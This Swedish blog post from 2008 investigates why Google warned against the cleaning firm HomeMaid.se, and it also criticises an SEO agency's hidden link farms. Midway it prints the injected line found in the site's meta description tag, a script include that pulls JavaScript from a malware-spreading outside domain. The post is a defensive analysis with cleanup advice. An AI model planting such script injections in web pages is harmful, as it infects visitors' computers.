Uppdatering 08-08-29: Google har nu, sedan HomeMaid städat (!) bort den skadliga koden från sajten plockat bort varningen för att besöka dem. Samtidigt har FireFox slutat varna för besök på sajten. Nu kan man återigen lugnt besöka www.HomeMaid.se utan att riskera att smittas av något elände. Rubriken är härmed ändrad.
Jag har gjort en del sökningar kring sökfraser som har med städfirmor och deras verksamhet att göra på sistone. Man kan lugnt säga att städbranschen inte är särskilt duktiga på synlighet i sökmotorerna. Det brukar i stort sett bara vara olika typer av söktjänster som visas på de termer som jag har använt samt en och annan tjänsteleverantör för offerering och budgivning. Ett och annat undantag finns – en och annan enstaka städfirma syns faktiskt i sökresultaten. Om än inte alltid på det sätt som man har väntat sig… Eller vad sägs om detta sökresultat som visas vid sökningar på frasen städning?
Nog för att man har hört talas om den smutsiga städbranschen, men det här tar ju nästan priset. Trygg städning i all ära – men det känns ju väldigt trist att sajten kan komma att skada min dator… Trots det klickar jag på länken och möts av följande interstitial, levererad av Google:
Sammanfattningsvis går det ut på att Google varnar för att sajten kan innehålla skript som kan komma att installera fulprogram (Googles term är faktiskt badware) på datorer som besöker den. Av 100 testade sidor innehöll fyra sidor programvara som kan skada datorer som besöker sajten. Senast Google hittade skadliga program på sajten var den 14 augusti, alltså för över en vecka sedan.
Of the 100 pages we tested on the site over the past 90 days, 4 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 08/14/2008, and the last time suspicious content was found on this site was on 08/14/2008.
Malicious software includes 2 scripting exploit(s). Successful infection resulted in an average of 3 new processes on the target machine.
Dels kan man tycka att det är smått skandalöst att ett svenskt börsnoterat företag har en sajt som innehåller denna typ av säkerhetshål, men det jag faktiskt främst förvånas över är att Google trots att man varnar besökarna, ändå listar sajten på förstasidan vid en sökning efter ordet städning på Google.se. En sådan position uppnår inte en sajt utan att göra en hel massa rätt på sajten eller utan att anlita någon som är bra på sökmotoroptimering.
Faktum är att Googles kvalitetsriktlinjer nämner just denna typ av problem som något man definitivt bör undvika, och om man utsätts för det, bör åtgärda så fort man bara kan.
Don’t create pages with malicious behavior, such as phishing or installing viruses, trojans, or other badware.
Fortfarande utan att klicka mig in till www.Homemaid.se tar jag mig en titt på vilka sajter som länkar till dem. Den bästa listan över länkar till sajten hittar man som vanligt via Yahoo Site Explorer. Naturligtvis innehåller listan mängder av den typen av länkar som alla börsnoterade bolag har. Det rör sig om länkar från aktieforum och aktiemäklare och från Stockholmsbörsen, men på plats 49 till 72 hittar man också det jag letar efter. En maffig länkkatalog, levererad av Argonova men placerat på sajter som t.ex. Aquababy.se:
Det verkar onekligen som om Homemaid har anlitat Argonova för sökmotoroptimeringen av sajten och som att Argonova har valt att lägga in dem i dolda länkfarmar från sina andra kunder sajter. Även denna typ av aktivitet är något som Google direkt avråder ifrån i sina kvalitetsriktlinjer:
Don’t participate in link schemes designed to increase your site’s ranking or PageRank. In particular, avoid links to web spammers or ”bad neighborhoods” on the web, as your own ranking may be affected adversely by those links.
Nu tar jag mot till mig och går in och tittar på www.homemaid.se för att se varför i all världen Argonova har sett det nödvändigt att använda dolda länkkataloger för att få några länkar in till www.Homemaid.se. Det blir stopp direkt. Jag möts av den här bilden när jag försöker gå in på den med Firefox 3.01:
Här bestämmer jag mig för att först stänga av alla javascript, all hämtning av bilder och ställa in den högsta säkerhetsnivån och sedan öppna sajten i Safari istället. Där slipper jag igenom utan varningar.
Nej. Det första jag kan konstatera när jag, en smula nervöst och trevande tar mig in på sajten, är att www.Homemaid.se inte av egen kraft skulle placera sig i sökmotorerna på andra termer än företagsnamnet Homemaid.
Det märks visserligen att en sökmotorkonsult har varit inne och försökt styra upp situationen en smula. Längst ner på varje sida ligger en sidfot som innehåller orden flyttstädning, fönsterputsning, kontorsstädning, omvårdnad och städning. Det är rätt. Så skulle nog jag också göra. Men sedan är det faktiskt värre. Alla ord utom ordet städning är länkade till undersidor på sajten och länken städning går till sajtens förstasida, som har title-taggen ”Homemaid erbjuder säker och trygg städning både kontor och hem.” I övrigt nämns bara ordet städning bara två gånger på sidan (varav den ena är länken i sidfoten).
Nästa steg blir att kontrollera description-texten på sidan. Först konstaterar jag att sajten, enligt språkvariabeln, påstår sig vara publicerad på engelska (vilket knappast hjälper till för sökningar efter svenska ord). Men i nästa sekund ser jag vad det är som har gjort att såväl Google som Firefox (och faktiskt även Yahoo) varnar oss för att besöka sajten. Description-texten ser ut så här:
<META NAME=”description” CONTENT=”HomeMaid är ett modernt tjänsteföretag som verkar för att skapa bättre livskvalitet för våra kunder. Vi erbjuder bland annat städning, städ, kontorsstädning, omvårdnad, fönsterputsning, flyttstäd, flyttstädning mm<script src=http://www.bnsdrv.com/ngg.js></script>”>
Sajten där skriptet som anropas ligger, bnsdrv.com, är bortplockad sedan en tid och går inte längre att nå. Exploiten har gjort att det har varnats för domänen sedan i mitten av juli. Det kan man lära sig mer om här:
http://www.malwaredomainlist.com/mdl.php?search=bnsdrv.com&colsearch=All&quantity=50
Googles varning mot domänen bnsdrv.com visar att den har använts för spridning av skadlig kod på åtminstone 326 sajter. Vem som egentligen ligger bakom domänen bnsdrv.com och vem som sedan har lyckats lägga in ett javascript hos HomeMaid.se och andra sajter vågar jag inte ha några tankar kring. Det troligaste är väl att sajten har blivit hackad och att bnsdrv.com också har blivit utsatt för ett angrepp av någon som har placerat det skadliga javascriptet där. (Helt parentetiskt är det rätt festligt att den tekniska kontakten för bnsdrv.com har en epost som tyder på att han bär det svenskklingande, men på grund av en hockeytokig webb, totalt osökbara namnet Markus Näslund.)
Argonova har helt uppenbarligen valt att ägna sig åt en smått antik metod för att bygga länkar till Homemaid.se. Tekniken går ut på att lägga upp länkfarmar hos sina kunder, som i sin tur länkar vidare till andra kunder, med de eftersträvade sökorden som länkad text. Ett exempel på hur det kan se ut hittar vi redan hos Argonova, som uppenbarligen lever som de lär:
http://www.argonova.se/info/fakta/partners/externt.php
Andra exempel på liknande sidor hittar vi på till exempel
Alla de ovanstående är SEO-kunder hos Argonova och det finns gott om liknande sidor. Några av dem kan man hitta genom att söka efter [argonova homemaid] vill man hitta fler kan man försöka efter [argonova webbyrå som arbetar med webbdesign] eller [länkpartners sökmotoroptimering] (då man även hittar en och annan kund hos göteborgsföretaget SEOdesign). Länkfarmar av den här typen har ingen stor effekt hos Google och har blivit alltmer omoderna efter att Altus gjorde sådan skandal med tekniken för några år sedan – men just det här fallet visar att de trots allt kan ha viss effekt fortfarande. Ändå är det en smula förvånande att Argonova fortfarande ägnar sig åt dolda länkfarmar – det brukar sällan vara populärt hos kunderna när det upptäcker att de har denna typ av länkfarmar på sina sajter. Förutom Argonova är det väl i stort sett bara göteborgsföretaget SEOdesign som sysslar med detta idag.
I just det här fallet kan det dessutom visa sig vara direkt skadligt att ha länkar till HomeMaid. Google brukar inte direkt premiera sidor som länkar till sajter som sprider skadlig kod. Faktum är att en omläsning av ovan citerade punkt ur Googles kvalitetsriktlinjer är på sin plats:
Don’t participate in link schemes designed to increase your site’s ranking or PageRank. In particular, avoid links to web spammers or ”bad neighborhoods” on the web, as your own ranking may be affected adversely by those links.
[Min kursivering.]
I och med att HomeMaid.se har listats som potentiellt skadlig enär sajten (om än motvilligt) har bidragit till att sprida skadlig kod så har den blivit vad Google brukar referera till som ett bad neighborhood – ett dåligt område – på webben. Dåliga områden länkar man inte till om man inte vill utsätta sig för eventuella repressalier i form av sämre sökmotorplaceringar.
Kontentan av det hela är alltså att Argonova inte bara har utsatt HomeMaid för en viss risk när man har skaffat länkar till sajten från dolda länkarmar hos andra kunder. Man har även utsatt dessa kunder för en risk i och med att dessa har länkat till en sajt som Google har identifierat som ett dåligt område på webben.
Vad kan HomeMaid göra? HomeMaid bör så fort som möjligt se till att gå igenom alla sidor på sin sajt och plocka leta efter instanser där javascript inkluderar kod från andra sajter. (Börja med de fyra sidor som Google listar här.) Dessutom bör man se över sin säkerhet kring webbplatsen, byta alla lösenord och gå igenom sina serverloggar för att ta reda på hur och när detta javascript kan ha placerats i meta description-taggen på sajtens förstasida. (När man ändå håller på bör man nog titta på hur dotterföretaget Fixelina och sajten fixelina.se ser ut – som den hanteras just nu försämrar den bara sökresultaten för bägge domänerna.) Så fort detta är gjort bör man kontakta Google (gärna via sitt webmastertools-konto) och meddela att man har fått bort all skadlig kod från sajten. I nästa steg borde man nog ta ett ordentligt grepp kring sin onpage-optimering. Med den mängd länkar som finns till den borde man klara sig bättre i sökmotorerna utan att behöva ta till fulmetoder som länkfarmar.
Vad kan Argonova göra? Argonova bör nog fortast möjligt se till att plocka bort HomeMaid.se från sina övriga kunders länksidor. Klokast vore det nog att se till att länksidorna försvinner helt och hållet.
Vad kan Argonovas andra kunder göra? Argonovas övriga kunder bör nog titta efter om de har dolda länksidor som länkar till HomeMaid på sin sajt. Enklast sker det genom att skriva in en sökning som t.ex. [site:www.domän.se homemaid], [site:www.domän.se sökmotoroptimering] eller [site:www.domän.se länkpartner] i sökrutan hos Google (byt ut domän.se mot er egen domän).
Vad kan vi andra göra? Vi kan ta lärdom, se över säkerheten kring webbplatsen, titta igenom vilka länkar som finns på våra egna sajter (till exempel med hjälp av Live.com och kommandot +linkfromdomain:homemaid.se där ni byter ut homemaid.se mot er egen domän (och nej, ni behöver inte titta – HomeMaid.se har inga dolda länkfarmar på sajten vad jag kan se). Vi kan börja använda Firefox som så snällt varnar oss mot att besöka sajter som innehåller skadlig kod men i övrigt kan vi mest ägna oss åt att kläcka skämt kring den tidvis smutsiga städbranschen och den mestadels smutsiga SEO-branschen.
